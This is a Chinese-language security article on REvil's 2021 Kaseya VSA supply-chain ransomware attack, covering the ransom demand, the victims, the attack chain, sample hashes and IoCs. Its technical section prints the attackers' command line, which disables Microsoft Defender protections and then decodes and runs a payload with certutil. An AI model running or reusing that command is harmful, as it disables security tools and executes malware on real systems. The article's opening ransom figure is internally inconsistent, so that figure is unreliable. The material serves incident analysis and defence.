眼下REvil勒索团伙已经开出史上最高勒索赎金：7000万元（约合4.52亿人民币）。

在他们的暗网博客上发布的一条消息中，REvil 团伙首次正式将这次攻击归咎于他们，并声称他们在Kaseya事件期间锁定了超过100万个系统。

图一，REvil勒索表示对该事件负责并开出天价勒索

“周五 (02.07.2021) 我们对MSP提供商发起了攻击。超过100万个系统受到感染。如果有人想就通用解密器进行谈判——我们的价格是7000万美元的 BTC，我们将公开发布解密所有受害者文件的解密器，这样每个人都可以在不到一个小时的时间内从攻击中恢复过来。如果您对此类交易感兴趣，请使用受害者“自述”文件说明与我们联系。”

如果受害者支付，该要求将成为有史以来勒索江湖最高的勒索支付。

目前Kaseya发言人没有评论该公司是否会考虑支付REvil团伙的赎金要求。

在撰写本文时，据信Kaseya海啸级勒索软件事件影响了全球数千家公司。攻击发生在周五下午晚些时候，就在美国7月4日延长的周末之前，REvil团伙（或其合作者之一）利用Kaseya VSA服务器中的漏洞来访问安装在客户上的 VSA设备。VSA设备是基于Web的平台，通常由大型公司或托管服务提供商 (MSP) 用于管理远程计算机群。REvil团伙从受感染的VSA服务器转向所有连接的工作站和企业网络，以安装其有效载荷并加密客户文件，这是近年来最大的勒索软件爆发之一。

谁中招？

位于迈阿密的Kaseya公司表示，此次攻击涉及众多的小型企业，包括金融服务、旅游休闲以及多国的公共机构。瑞典连锁超市Coop称，因收银系统软件故障，其500家门店周六和周日被迫停业。瑞典另一家连锁药店、一个连锁加油站、国有铁路和瑞典公共电视台（SVT）也受到影响。据德新社报道，一家德国IT服务商认为，其数千家客户均受到此次攻击的影响。荷兰两家大型IT企业——VelzArt和Hoppenbrouwer Techniek也报告遇到了问题。Kaseya的首席执行官佛科拉（Fred Voccola）说，他估计受害企业数量在几千家，主要是小型公司，如牙科诊所、建筑设计公司、整形外科中心、图书馆等。他补充说，Kaseya在全球的37000家直接客户中，仅有50到60家受到波及。该公司已委托网络安全公司Mandiant对安全漏洞进行调查。美国联邦调查局（FBI）在一份声明中称，正在调查此案，但鉴于这一网络攻击的规模，或许“无法对每一位受害者做出单独回应”。美国国家安全助理顾问纽伯格（Anne Neuberger）表示，拜登总统“已指令调动政府所有资源，调查这一案件”，并呼吁所有认为自己的网络系统受到侵害的机构和个人同FBI取得联系。

远程管理软件提供商 Kaseya 在全球拥有36000个MSP客户，它在周五发现的这次攻击导致美国总统乔拜登下令启动全面的联邦调查，这也是继拜登上台以来面临的三大头疼网络安全事件之一，。

复盘攻击分析

Kaseya在2021年7月2日美国时间晚上10:00发布的公告指出：    

“所有本地VSA服务器应继续保持关闭状态，直到Kaseya发出有关何时可以安全恢复操作的进一步指示。在重新启动VSA之前，需要安装补丁。一旦Kaseya确定我们可以安全地恢复运营，SaaS和托管VSA服务器将开始运行。”    

据研究人员称，REvil 勒索软件针对“Kaseya VSA”执行的大规模供应链攻击已经影响了多家托管服务提供商 (MSP) 及其客户。勒索软件是在产品明显自动更新后交付的。Kaseya的远程IT管理软件以高权限管理系统，从而允许勒索软件在客户系统中轻松传播。     

Kaseya VSA Ransomware攻击的攻击链如下图所示。  

图 2：Kaseya VSA Ransomware攻击的攻击链 

Kaseya VSA是一个自动化的软件补丁管理和漏洞管理系统。勒索软件团伙通过Kaseya VSA代理修补程序利用软件更新，并向客户端提供 REvil 加密器负载。名为“agent.exe”的修补程序文件嵌入了恶意DLL文件，该文件使用名为“MsMpEng.exe”的防御者可执行文件加载到合法的Microsoft Defender中。 

互联网上Kaseya网络服务器作为互联网扫描活动的一部分，我们找到了54台装有Kaseya应用服务器的服务器。由于此事件，部分服务器已关闭。

REvil（Ransomware Evil），也称为Sodinokibi，成立于2019年，作为勒索软件即服务运行，即为其附属机构提供预构建的勒索软件工具以执行攻击。REvil勒索软件首先被GOLD SOUTHFIELD威胁组织使用。REvil是最复杂的勒索软件组织之一，并且是数次重大攻击的幕后黑手。图 3 显示了 REvil 使用的赎金票据。       

  图 3：赎金记录  

技术分析  

Cyble研究团队能够发现最近的REvil勒索软件样本为 SHA256:

D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E

 发现主要的REvil样本是一个dropper，VC编译的二进制文件，其中包含名为“SOFTIS”和“MODLIS”的恶意资源。   

如图4所示，它在运行时加载资源；资源文件是REvil负载“mpsvc.dll”和加载程序“MsMpEng.exe”。  

  图 4：Dropper文件    

执行后，dropper会在以下系统目录中创建REvil有效负载文件和加载程序文件。    

 C:\Windows\mpsvc.dll  （在合法的Microsoft Defender中加载）  

 C:\Windows\MsMpEng.exe（合法的加载程序文件）    

下面的图5显示了受害者机器上的有效载荷及其执行情况。  

  图 5：有效负载文件    

一旦有效负载安装在受害者的机器上，它就会加密所有文档文件。受感染系统进程内存的进程浏览器视图如图 6 所示。    

  图 6：流程浏览器  

最后，勒索软件会使用勒索字条锁定受害者的屏幕。图 7 显示了带有加密文件的锁定屏幕。勒索软件不需要有效的互联网连接来执行加密，并为每个受感染的系统生成一个唯一的密钥。    

  图 7：加密文件  

此外，REvil具有禁用Microsoft Defender服务的功能。

例如DisableRealtimeMonitoring、

DisableIntrusionPreventionSystem、

DisableIOAVProtection 

和DisableScriptScanning。

它尝试执行PowerShell命令来中断Microsoft Defender服务，如下所示。 

“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $ true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% > > C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C :\Windows\cert.exe & c:\kworking\agent.exe 

我们的分析发现，每个系统都使用不同的扩展名进行加密。勒索软件可能会使用系统信息来生成随机扩展。   赎金票据包含链接，只能使用赎金票据中的密钥访问。该链接属于 REvil (Sodinokibi)，其中包含与赎金金额、解密器和计时器相关的信息。     

图 8 展示了勒索信中的勒索软件组织网站。  

  图 8：REvil 的勒索软件组网站  

 图 9 显示了REvil勒索软件组的攻击热图，2021年有131名REvil勒索软件受害者。  

    图 9：REvil 的攻击热图  

图10描绘了Cyble研究团队观察到的REvil勒索软件受害者的行业攻击分布。  

  图 10：REvil的行业攻击分布。 

 REvil Ransomware组织是定期针对多个受害者的最活跃的勒索软件组织之一。根据我们的研究，REvil最近的目标导致了整个供应链的大规模爆发。      

结论   

网络间谍活动发展迅速，我们过去也看到过供应链攻击，这些攻击影响了大型组织。攻击者将继续寻找新的攻击媒介以保持躲避，因此组织加强其安全性变得非常重要。     

 妥协指标 (IoC)：      

指标  指标类型  描述  

8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd    SHA-256  mpsvc.dll  

e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2    SHA-256  DLL文件  

d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e    SHA-256  示例文件  

9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1  SHA-256  文件.exe  

湖南永定公安：某健康公司未履行网络安全义务！罚！

来！千人白帽养成计划第四期，来了！

多一个点在看

多一条小鱼干